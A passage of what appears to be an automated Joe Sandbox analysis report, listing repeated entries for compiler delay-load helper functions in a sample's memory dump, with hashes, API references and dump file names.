                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 322e09d81ce1321fc7803149812d7fd4247d14ad1871e6a3eb19a40af1767a47
                                          • Instruction ID: 082d1889c15e60737bc6b53c91a10ed9d930804600b20e49536bc9c4b4749d21
                                          • Opcode Fuzzy Hash: 322e09d81ce1321fc7803149812d7fd4247d14ad1871e6a3eb19a40af1767a47
                                          • Instruction Fuzzy Hash: 2EB012C22680407C350491661C0EE7B020DC0C1F14330407EF494C0496BC408E043C72
                                          Function 00F9E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: f4b26cc9bfbeed2aa0eb41fa81d2199c7a6d834987ee293d54030a5bbe00a100
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: f4b26cc9bfbeed2aa0eb41fa81d2199c7a6d834987ee293d54030a5bbe00a100
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 365b4b2a4c8beca1d3ab5f865d5e6f3fec02fa1c23fb0b3c6cf37df4d1933a50
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: 365b4b2a4c8beca1d3ab5f865d5e6f3fec02fa1c23fb0b3c6cf37df4d1933a50
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: d790b9106b90a9ad111661aa746666e998a85625cb05389db0e266ec847ca39f
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: d790b9106b90a9ad111661aa746666e998a85625cb05389db0e266ec847ca39f
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 0cca33d1b7688ff7ee3cb1c37f96a94b049f219f7fc74546b29b8ab761aab4f4
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: 0cca33d1b7688ff7ee3cb1c37f96a94b049f219f7fc74546b29b8ab761aab4f4
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 97ce80070bac272efe73fe73b96f2c3df156ae1081f6e36b39030fdde3561c95
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: 97ce80070bac272efe73fe73b96f2c3df156ae1081f6e36b39030fdde3561c95
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: b1af4f86c5e2f7b89c73ff50353eeac3d7f6ca0632fd215f81877f388b61e8dc
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: b1af4f86c5e2f7b89c73ff50353eeac3d7f6ca0632fd215f81877f388b61e8dc
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 0f453bc83e7e1b402fd82e2281d1607708b515d7d4b46d5f595790d4e0e23a99
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: 0f453bc83e7e1b402fd82e2281d1607708b515d7d4b46d5f595790d4e0e23a99
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: c0ab05af213ef4d0bca1f0e1207ba84bf8cfc859722112af2dd369fa090cb974
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: c0ab05af213ef4d0bca1f0e1207ba84bf8cfc859722112af2dd369fa090cb974
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: b52c5b88f93cad432800a197165e4967e0c033507cd572d7dfe76cbf34edadda
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: b52c5b88f93cad432800a197165e4967e0c033507cd572d7dfe76cbf34edadda
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 52a5310e6dfa2300876ca802e0f9d206d70380b93f2719ec69a559ecd8fe868d
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: 52a5310e6dfa2300876ca802e0f9d206d70380b93f2719ec69a559ecd8fe868d
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 460e0ec668085582fa5cc66ad840a45a1f9bd77c63f4204b2cdb73f395e96f8d
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: 460e0ec668085582fa5cc66ad840a45a1f9bd77c63f4204b2cdb73f395e96f8d
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          Function 00F9E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 984b4d692212d225516ee561657864c19351225a5969de100820854d8259cd2a
                                          • Instruction ID: 40f94ba22af81694572e534dd6766915bcb3d49d1236cf84867b7646ff8207d4
                                          • Opcode Fuzzy Hash: 984b4d692212d225516ee561657864c19351225a5969de100820854d8259cd2a
                                          • Instruction Fuzzy Hash: D9A011E22A80023C3808A283AC02EBB030EC0C0B20330882EF828A0080AC80080038B3
                                          Function 00F9E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: fc18922400f6550e1132f9c5b1e5e7ee74a5d633859192994919ea1c52e353f1
                                          • Instruction ID: a479b96bf35fe1c3b92d028b7808eac190779b7a7d9c28b3ad2fc6362bd2aef5
                                          • Opcode Fuzzy Hash: fc18922400f6550e1132f9c5b1e5e7ee74a5d633859192994919ea1c52e353f1
                                          • Instruction Fuzzy Hash: DFA011E22A8002BC3808A283AC02EBB030EC0C0B20330882EF80A80080AC80080038B3
                                          Function 00F9E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: e1ad77b3a72eed6df3415ace1ef28b9484e26268d99b0687e771b64e3e9bdece
                                          • Instruction ID: a479b96bf35fe1c3b92d028b7808eac190779b7a7d9c28b3ad2fc6362bd2aef5
                                          • Opcode Fuzzy Hash: e1ad77b3a72eed6df3415ace1ef28b9484e26268d99b0687e771b64e3e9bdece
                                          • Instruction Fuzzy Hash: DFA011E22A8002BC3808A283AC02EBB030EC0C0B20330882EF80A80080AC80080038B3
                                          Function 00F9E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
